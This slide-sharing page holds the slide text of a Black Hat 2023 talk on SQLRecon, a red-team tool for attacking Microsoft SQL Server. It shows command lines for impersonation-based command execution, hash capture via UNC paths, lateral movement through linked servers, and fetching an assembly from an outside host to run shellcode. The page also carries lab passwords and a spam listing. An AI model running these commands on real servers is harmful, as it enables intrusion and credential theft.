Temporal intro and event loop
 
Exploring how Students Map Social Engineering Techniques to the ATT&CK Framew...
Exploring how Students Map Social Engineering Techniques to the ATT&CK Framew...Exploring how Students Map Social Engineering Techniques to the ATT&CK Framew...
Exploring how Students Map Social Engineering Techniques to the ATT&CK Framew...
 
Thick client pentesting_the-hackers_meetup_version1.0pptx
Thick client pentesting_the-hackers_meetup_version1.0pptxThick client pentesting_the-hackers_meetup_version1.0pptx
Thick client pentesting_the-hackers_meetup_version1.0pptx
 

Similar to Black Hat USA Arsenal 2023: Abusing Microsoft SQL Server with SQLRecon

theVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdftheVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdfGabriel Mathenge
 
Ultimate Free SQL Server Toolkit
Ultimate Free SQL Server ToolkitUltimate Free SQL Server Toolkit
Ultimate Free SQL Server ToolkitKevin Kline
 
SQL Server Security - Attack
SQL Server Security - Attack SQL Server Security - Attack
SQL Server Security - Attack webhostingguy
 
Secure SDLC for Software
Secure SDLC for Software Secure SDLC for Software
Secure SDLC for Software Shreeraj Shah
 
Service Virtualization: What Testers Need to Know
Service Virtualization: What Testers Need to KnowService Virtualization: What Testers Need to Know
Service Virtualization: What Testers Need to KnowTechWell
 
(WEB301) Operational Web Log Analysis | AWS re:Invent 2014
(WEB301) Operational Web Log Analysis | AWS re:Invent 2014(WEB301) Operational Web Log Analysis | AWS re:Invent 2014
(WEB301) Operational Web Log Analysis | AWS re:Invent 2014Amazon Web Services
 
BSides Roma 2018 - Red team techniques
BSides Roma 2018 - Red team techniquesBSides Roma 2018 - Red team techniques
BSides Roma 2018 - Red team techniquesGuglielmo Scaiola
 
Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...
Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...
Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...Beau Bullock
 
TechEd Africa 2011 - OFC308: SharePoint Security in an Insecure World: Unders...
TechEd Africa 2011 - OFC308: SharePoint Security in an Insecure World: Unders...TechEd Africa 2011 - OFC308: SharePoint Security in an Insecure World: Unders...
TechEd Africa 2011 - OFC308: SharePoint Security in an Insecure World: Unders...Michael Noel
 
DevOps and the Future of Enterprise Security
DevOps and the Future of Enterprise SecurityDevOps and the Future of Enterprise Security
DevOps and the Future of Enterprise SecurityFrank Kim
 
Security For Application Development
Security For Application DevelopmentSecurity For Application Development
Security For Application Development6502programmer
 
Application of Machine Learning in Cybersecurity
Application of Machine Learning in CybersecurityApplication of Machine Learning in Cybersecurity
Application of Machine Learning in CybersecurityPratap Dangeti
 
Internal penetration test_hitchhackers_guide
Internal penetration test_hitchhackers_guideInternal penetration test_hitchhackers_guide
Internal penetration test_hitchhackers_guideDarin Fredde
 
SQLSecurity.ppt
SQLSecurity.pptSQLSecurity.ppt
SQLSecurity.pptCNSHacking
 
SQLSecurity.ppt
SQLSecurity.pptSQLSecurity.ppt
SQLSecurity.pptLokeshK66
 
Jan 2008 Allup
Jan 2008 AllupJan 2008 Allup
Jan 2008 Allupllangit
 

Similar to Black Hat USA Arsenal 2023: Abusing Microsoft SQL Server with SQLRecon (20)

theVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdftheVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
 
SQL Injection
SQL InjectionSQL Injection
SQL Injection
 
Ultimate Free SQL Server Toolkit
Ultimate Free SQL Server ToolkitUltimate Free SQL Server Toolkit
Ultimate Free SQL Server Toolkit
 
SQL Server Security - Attack
SQL Server Security - Attack SQL Server Security - Attack
SQL Server Security - Attack
 
Sqlmap
SqlmapSqlmap
Sqlmap
 
Secure SDLC for Software
Secure SDLC for Software Secure SDLC for Software
Secure SDLC for Software
 
Service Virtualization: What Testers Need to Know
Service Virtualization: What Testers Need to KnowService Virtualization: What Testers Need to Know
Service Virtualization: What Testers Need to Know
 
(WEB301) Operational Web Log Analysis | AWS re:Invent 2014
(WEB301) Operational Web Log Analysis | AWS re:Invent 2014(WEB301) Operational Web Log Analysis | AWS re:Invent 2014
(WEB301) Operational Web Log Analysis | AWS re:Invent 2014
 
Tech f43
Tech f43Tech f43
Tech f43
 
BSides Roma 2018 - Red team techniques
BSides Roma 2018 - Red team techniquesBSides Roma 2018 - Red team techniques
BSides Roma 2018 - Red team techniques
 
Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...
Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...
Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...
 
TechEd Africa 2011 - OFC308: SharePoint Security in an Insecure World: Unders...
TechEd Africa 2011 - OFC308: SharePoint Security in an Insecure World: Unders...TechEd Africa 2011 - OFC308: SharePoint Security in an Insecure World: Unders...
TechEd Africa 2011 - OFC308: SharePoint Security in an Insecure World: Unders...
 
DevOps and the Future of Enterprise Security
DevOps and the Future of Enterprise SecurityDevOps and the Future of Enterprise Security
DevOps and the Future of Enterprise Security
 
Security For Application Development
Security For Application DevelopmentSecurity For Application Development
Security For Application Development
 
Web Security
Web SecurityWeb Security
Web Security
 
Application of Machine Learning in Cybersecurity
Application of Machine Learning in CybersecurityApplication of Machine Learning in Cybersecurity
Application of Machine Learning in Cybersecurity
 
Internal penetration test_hitchhackers_guide
Internal penetration test_hitchhackers_guideInternal penetration test_hitchhackers_guide
Internal penetration test_hitchhackers_guide
 
SQLSecurity.ppt
SQLSecurity.pptSQLSecurity.ppt
SQLSecurity.ppt
 
SQLSecurity.ppt
SQLSecurity.pptSQLSecurity.ppt
SQLSecurity.ppt
 
Jan 2008 Allup
Jan 2008 AllupJan 2008 Allup
Jan 2008 Allup
 

Recently uploaded

Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Paola De la Torre
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Allon Mureinik
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountPuma Security, LLC
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 
Google AI Hackathon: LLM based Evaluator for RAG
Google AI Hackathon: LLM based Evaluator for RAGGoogle AI Hackathon: LLM based Evaluator for RAG
Google AI Hackathon: LLM based Evaluator for RAGSujit Pal
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Miguel Araújo
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Drew Madelung
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Servicegiselly40
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfEnterprise Knowledge
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitecturePixlogix Infotech
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityPrincipled Technologies
 

Recently uploaded (20)

Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
Google AI Hackathon: LLM based Evaluator for RAG
Google AI Hackathon: LLM based Evaluator for RAGGoogle AI Hackathon: LLM based Evaluator for RAG
Google AI Hackathon: LLM based Evaluator for RAG
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC Architecture
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 

Black Hat USA Arsenal 2023: Abusing Microsoft SQL Server with SQLRecon

  • 1. #BHUSA @BlackHatEvents Abusing Microsoft SQL Server with SQLRecon Sanjiv Kawa IBM X-Force Red Adversary Services
  • 2. #BHUSA @BlackHatEvents Information Classification: General Senior Managing Security Consultant, Adversary Services at IBM X-Force Red - Red Team Operator / Adversary Simulation - Post-Exploitation Tool Developer - github.com/xforcered/SQLRecon Sanjiv Kawa @sanjivkawa github.com/skahwah Intro IBM X-Force Red
  • 3. #BHUSA @BlackHatEvents Information Classification: General Agenda Microsoft SQL Server Overview 2 min SQLRecon Overview 4 min 10 Demos! 20 min - Enumeration - Standard Modules - Attacking MS SQL Server with Low Privileges - Abusing MS SQL Impersonation - Attacking Linked MS SQL Servers - Attacking MS MECM / SCCM Databases Defensive Considerations 3 min Questions 5 min
  • 4. #BHUSA @BlackHatEvents Information Classification: General Get Involved! Hack with me Download the latest release of SQLRecon (v3.3) from github.com/skahwah/SQLRecon/releases Spin up a Windows VM Connect to SSID SQLRecon-Lab, don’t worry, it’s safe Connection details will be provided before demo’s
  • 5. #BHUSA @BlackHatEvents Information Classification: General Microsoft SQL Server Overview
  • 6. #BHUSA @BlackHatEvents Information Classification: General MS SQL Server Overview Relational database which allows the storage and retrieval of data Deployed on-premise on top of Microsoft Server or in the cloud Used by businesses of all sizes, not just large enterprise networks Tightly integrated into Active Directory / Azure Active Directory
  • 7. #BHUSA @BlackHatEvents Information Classification: General Why Attack MS SQL Server? Often overlooked Often misconfigured BUILTINUsers can connect to MS SQL Server by default, and: - Execute basic SQL commands - Determine privileges via user mapping/roles - UNC Path injection - Piggyback off rights to compromise linked SQL servers
  • 8. #BHUSA @BlackHatEvents Information Classification: General Why Attack MS SQL Server? In late 2022, Kaspersky reported seeing a 56% rise in MS SQL Server attacks
  • 10. #BHUSA @BlackHatEvents Information Classification: General What’s currently available? A good amount of offensive MS SQL Sever tools already exist
  • 11. #BHUSA @BlackHatEvents Information Classification: General How did this research come about? Like most tooling … to solve a problem encountered on an engagement PowerShell is good, but C# is better when evading modern defensive controls Address the MS SQL Server C# post-exploitation tooling gap - Modernize the approach red teamers can take when facing MS SQL Server - Operational Security - Execution Guardrails - SQLRecon works with a diverse set of C2 frameworks - Fork & Run and In-Process compatible
  • 12. #BHUSA @BlackHatEvents Information Classification: General New Features for Black Hat SQLRecon v2.2.2 - Windows Token - Local Database - AzureAD 3 Authentication Providers
  • 13. #BHUSA @BlackHatEvents Information Classification: General New Features for Black Hat SQLRecon v2.2.2 - Windows Token - Local Database - AzureAD 3 Authentication Providers SQLRecon v3.3 + Windows Domain + Azure Local Database 5 Authentication Providers
  • 14. #BHUSA @BlackHatEvents Information Classification: General New Features for Black Hat SQLRecon v2.2.2 - Enumerate and Query MS SQL databases - Execute arbitrary operating system commands - Abuse impersonation - Attack linked MS SQL servers 57 Modules
  • 15. #BHUSA @BlackHatEvents Information Classification: General New Features for Black Hat SQLRecon v2.2.2 - Enumerate and Query MS SQL databases - Execute arbitrary operating system commands - Abuse impersonation - Attack linked MS SQL servers 57 Modules SQLRecon v3.3 + Ground up rewrite using MS C#/.NET code guide + Many new enumeration and execution modules + Support for attacking MECM / SCCM Databases + Better OPSEC and execution guardrails + Brand new wiki + And more! 83 Modules
  • 16. #BHUSA @BlackHatEvents Information Classification: General Command Line Usage SQLRecon is straight forward to use. There are only three required arguments:
  • 17. #BHUSA @BlackHatEvents Information Classification: General Command Line Usage SQLRecon is straight forward to use. There are only three required arguments: - An authentication type SQLRecon.exe /Auth:WinToken
  • 18. #BHUSA @BlackHatEvents Information Classification: General Command Line Usage SQLRecon is straight forward to use. There are only three required arguments: - An authentication type - The hostname or IP address for a MS SQL Server SQLRecon.exe /Auth:WinToken /Host:SQL01
  • 19. #BHUSA @BlackHatEvents Information Classification: General Command Line Usage SQLRecon is straight forward to use. There are only three required arguments: - An authentication type - The hostname or IP address for a MS SQL Server - A module SQLRecon.exe /Auth:WinToken /Host:SQL01 /Module:databases
  • 20. #BHUSA @BlackHatEvents Information Classification: General Command Line Usage SQLRecon is straight forward to use. There are only three required arguments: - An authentication type - The hostname or IP address for a MS SQL Server - A module Example: Enumerating databases on a remote MS SQL Server. SQLRecon.exe /Auth:WinToken /Host:SQL01 /Module:databases
  • 21. #BHUSA @BlackHatEvents Information Classification: General Command Line Usage SQLRecon is straight forward to use. There are only three required arguments: - An authentication type - The hostname or IP address for a MS SQL Server - A module Example: Enumerating databases on a remote MS SQL Server SQLRecon.exe /Auth:WinToken /Host:SQL01 /Module:databases Shortform command line arguments and case-insensitive SQLRecon.exe /a:wintoken /h:172.16.10.101 /m:databases
  • 22. #BHUSA @BlackHatEvents Information Classification: General Authentication Providers SQLRecon supports 5 different MS SQL Server authentication providers:
  • 23. #BHUSA @BlackHatEvents Information Classification: General Authentication Providers SQLRecon supports 5 different MS SQL Server authentication providers: Authentication Type Example WinToken SQLRecon.exe /a:WinToken /h:host /m:module
  • 24. #BHUSA @BlackHatEvents Information Classification: General Authentication Providers SQLRecon supports 5 different MS SQL Server authentication providers: Authentication Type Example WinToken SQLRecon.exe /a:WinToken /h:host /m:module WinDomain SQLRecon.exe /a:WinDomain /d:domain /u:user /p:pass /h:host /m:module
  • 25. #BHUSA @BlackHatEvents Information Classification: General Authentication Providers SQLRecon supports 5 different MS SQL Server authentication providers: Authentication Type Example WinToken SQLRecon.exe /a:WinToken /h:host /m:module WinDomain SQLRecon.exe /a:WinDomain /d:domain /u:user /p:pass /h:host /m:module Local SQLRecon.exe /a:Local /u:user /p:pass /h:host /m:module
  • 26. #BHUSA @BlackHatEvents Information Classification: General Authentication Providers SQLRecon supports 5 different MS SQL Server authentication providers: Authentication Type Example WinToken SQLRecon.exe /a:WinToken /h:host /m:module WinDomain SQLRecon.exe /a:WinDomain /d:domain /u:user /p:pass /h:host /m:module Local SQLRecon.exe /a:Local /u:user /p:pass /h:host /m:module AzureAD SQLRecon.exe /a:AzureDomain /d:domain /u:user /p:pass /h:host /m:module
  • 27. #BHUSA @BlackHatEvents Information Classification: General Authentication Providers SQLRecon supports 5 different MS SQL Server authentication providers: Authentication Type Example WinToken SQLRecon.exe /a:WinToken /h:host /m:module WinDomain SQLRecon.exe /a:WinDomain /d:domain /u:user /p:pass /h:host /m:module Local SQLRecon.exe /a:Local /u:user /p:pass /h:host /m:module AzureAD SQLRecon.exe /a:AzureDomain /d:domain /u:user /p:pass /h:host /m:module AzureLocal SQLRecon.exe /a:AzureLocal /u:user /p:pass /h:host /m:module
  • 28. #BHUSA @BlackHatEvents Information Classification: General Module Overview SQLRecon has 83 different modules which can be used against MS SQL Server in a variety of scenarios Listed below are modules that can facilitate with privilege escalation, lateral movement, or command execution: Module Privilege Escalation Lateral Movement Command Execution xp_cmdshell ✅ ✅ ✅ OLE Automation Procedures ✅ ✅ ✅ CLR Integration for Custom .NET Assemblies ✅ ✅ ✅ Agent Jobs ✅ ✅ ✅ Cleartext ADSI Credential Retrieval ✅ MECM / SCCM User Management ✅ Cleartext MECM / SCCM Credential Retrieval ✅
  • 30. #BHUSA @BlackHatEvents Information Classification: General Get Involved! Rules Don’t DoS the lab. We’re all here to learn together. Don’t attack each other. We’re all here to learn together. You can attack AD and AAD if you want, but I promise you, it’s not going to get you anything.
  • 31. #BHUSA @BlackHatEvents Information Classification: General Get Involved! WiFi SSID: SQLRecon-Lab Password: SQLReconBH2023! Lab DC01 172.16.10.100 SQL01 172.16.10.101 SQL02 172.16.10.102 SQL03 172.16.10.104 MECM01 172.16.10.103 ecom01.database.windows.net Test Connection String SQLRecon.exe /a:WinDomain /d:kawalabs /u:jsmith /p:Password123 /h:172.16.10.101 /m:whoami Rules Don’t DoS the lab. We’re all here to learn together. Don’t attack each other. We’re all here to learn together. You can attack AD and AAD if you want, but I promise you, it’s not going to get you anything.
  • 32. #BHUSA @BlackHatEvents Information Classification: General Demo 1 Evaluating the current user’s permissions
  • 34. #BHUSA @BlackHatEvents Information Classification: General Demo 1 Recap - Used the whoami command to determine the permissions for the current user - Determined that KAWALABSJSmith is a Domain User in the KAWALABS.LOCAL domain.
  • 35. #BHUSA @BlackHatEvents Information Classification: General Demo 2 Locating MS SQL Servers in AD via SPNs
  • 37. #BHUSA @BlackHatEvents Information Classification: General Demo 2 Recap - Used SQLRecon to connect to AD in context of KAWLABSJSmith and locate MS SQL Servers via registered SPNs - Used SQLRecon to connect to SQL02 in context of KAWLABSJSmith and gather MS SQL Server information SQLRecon.exe /e:SQLSpns /d:kawalabs.local SQLRecon.exe /a:WinToken /h:SQL02 /m:info
  • 38. #BHUSA @BlackHatEvents Information Classification: General Demo 3 Enumerating Azure MS SQL Server Database
  • 40. #BHUSA @BlackHatEvents Information Classification: General Demo 3 Recap - Used SQLRecon to connect to an Azure MS SQL Server instance in context of KAWLABSJSmith and list permissions - Used SQLRecon to connect to an Azure MS SQL Server instance in context of KAWLABSJSmith and list databases - Performed an ad-hoc SQL query to obtain the contents of the cc table in the Payments database SQLRecon.exe /a:AzureAD /d:kawalabs.onmicrosoft.com /u:jsmith /p:Password123 /h:ecom01.database.windows.net /m:whoami SQLRecon.exe /a:AzureAD /d:kawalabs.onmicrosoft.com /u:jsmith /p:Password123 /h:ecom01.databases.windows.net /m:databases SQLRecon.exe /a:AzureAD /d:kawalabs.onmicrosoft.com /u:jsmith /p:Password123 /h:ecom01.databases.windows.net /database:Payments /m:query /c:”select * from cc”
  • 41. #BHUSA @BlackHatEvents Information Classification: General Demo 4 Unprivileged UNC Path Injection
  • 43. #BHUSA @BlackHatEvents Information Classification: General Demo 4 Recap - Used SQLRecon to connect to SQL02 in context of KAWLABSJSmith and initiate an SMB request to receive a NetNTLMv2 hash SQLRecon.exe /a:WinToken /h:SQL02 /m:smb /rhost:172.16.10.19Projects
  • 44. #BHUSA @BlackHatEvents Information Classification: General Demo 5 Operational Security and Execution Guardrails
  • 46. #BHUSA @BlackHatEvents Information Classification: General Demo 5 Recap - Used SQLRecon to connect to SQL01 in context of KAWLABSJSmith and attempted to execute commands via xp_cmdshell - Attempted to enable xp_cmdshell on SQL01 in context of KAWLABSJSmith - As expected, KAWLABSJSmith encounters an execution guardrail on SQL01 due to insufficient privileges SQLRecon.exe /a:WinToken /h:SQL01 /m:xpCmd /c:notepad.exe SQLRecon.exe /a:WinToken /h:SQL01 /m:enableXP
  • 47. #BHUSA @BlackHatEvents Information Classification: General Demo 6 Privilege Escalation: Abusing Impersonation BUILTINUsers can impersonate sa!
  • 48. #BHUSA @BlackHatEvents Information Classification: General Demo 6 Privilege Escalation: Abusing Impersonation
  • 50. #BHUSA @BlackHatEvents Information Classification: General Demo 6 Recap - Used SQLRecon to connect to SQL02 in context of KAWLABSJSmith and enumerate accounts that can be impersonated - Enabled OLE Automation Procedures on SQL02 via impersonation - Executed an arbitrary command using OLE Automation Procedures on SQL02 by abusing impersonation SQLRecon.exe /a:WinToken /h:SQL02 /m:impersonate SQLRecon.exe /a:WinToken /h:SQL02 /i:sa /m:iEnableOle SQLRecon.exe /a:WinToken /h:SQL02 /i:sa /m:iOleCmd /c:”powershell.exe ls 172.16.10.19Projects”
  • 51. #BHUSA @BlackHatEvents Information Classification: General Demo 6 Recap - Enabled xp_cmdshell on SQL02 via impersonation - Executed an arbitrary command using xp_cmdshell on SQL02 by abusing impersonation - Practiced good OPSEC by reverting OLE Automation Procedures and xp_cmdshell on SQL02 to the original state SQLRecon.exe /a:WinToken /h:SQL02 /m:iEnableXp SQLRecon.exe /a:WinToken /h:SQL02 /i:sa /m:iXpCmd /c:tasklist SQLRecon.exe /a:WinToken /h:SQL02 /i:sa /m:iDisableOle SQLRecon.exe /a:WinToken /h:SQL02 /i:sa /m:iDisableXp
  • 52. #BHUSA @BlackHatEvents Information Classification: General Demo 7 Lateral Movement: Abusing Linked MS SQL Servers SQL02 has an MS SQL Server link to SQL03
  • 53. #BHUSA @BlackHatEvents Information Classification: General Demo 7 Lateral Movement: Abusing Linked MS SQL Servers
  • 54. #BHUSA @BlackHatEvents Information Classification: General Demo 7 Lateral Movement: Abusing Linked MS SQL Servers - CLR Integration allows custom .NET assemblies to be imported into MS SQL Server - Assemblies get stored inside a SQL database Stored Procedure - You can then execute whatever is inside the custom assembly!
  • 55. #BHUSA @BlackHatEvents Information Classification: General Demo 7 Lateral Movement: Abusing Linked MS SQL Servers Basic Template: gist.github.com/skahwah/c92a8ce41f529f40c14715c91b8f90ce Process Hollowing: gist.github.com/skahwah/a585e176e4a5cf319b0c759637f5c410 // sql.cs // C:WindowsMicrosoft.NETFramework64v4.0.30319csc.exe /target:library c:tempsql.cs using System; using System.Data; using System.Data.SqlClient; using System.Data.SqlTypes; using Microsoft.SqlServer.Server; using System.Diagnostics; public partial class StoredProcedures { [Microsoft.SqlServer.Server.SqlProcedure] public static void CustomFunctionName() { Process proc = new Process(); proc.StartInfo.FileName = "C:WindowsSystem32notepad.exe"; proc.Start(); } }
  • 57. #BHUSA @BlackHatEvents Information Classification: General Demo 7 Recap - Used SQLRecon to connect to SQL02 in context of KAWLABSJSmith and enumerate linked MS SQL Server - Listed permissions on SQL03 after riding the MS SQL Server link via SQL02 - Enabled CLR Integration on SQL03 via SQL02 - Downloaded a custom .NET CLR assembly via HTTPS and executed it on SQL03 via SQL02 in order to laterally move SQLRecon.exe /a:WinToken /h:SQL02 /m:links SQLRecon.exe /a:WinToken /h:SQL02 /l:SQL03 /m:lWhoami SQLRecon.exe /a:WinToken /h:SQL02 /l:SQL03 /m:lEnableClr SQLRecon.exe /a:WinToken /h:SQL02 /l:SQL03 /m:lClr /dll:https://cdn.popped.io/favicon.png /function:ExecuteShellcode
  • 58. #BHUSA @BlackHatEvents Information Classification: General Demo 8 Credential Abuse: ADSI Double-Link Boomerang SQL03 has an ADSI link to DC01
  • 59. #BHUSA @BlackHatEvents Information Classification: General Demo 8 Credential Abuse: ADSI Double-Link Boomerang
  • 61. #BHUSA @BlackHatEvents Information Classification: General Demo 8 Recap - Used SQLRecon to connect to SQL02 in context of KAWLABSJSmith and enumerate links on SQL03 - Started a local LDAP server on SQL03 via SQL02 an obtained the cleartext credential for the account used to link SQL03 to DC01 SQLRecon.exe /a:WinToken /h:SQL02 /l:SQL03 /m:lLinks SQLRecon.exe /a:WinToken /h:SQL02 /l:SQL03 /m:lAdsi /rhost:linkADSI /lport:49103
  • 62. #BHUSA @BlackHatEvents Information Classification: General Demo 9 SCCM / MECM Enumeration
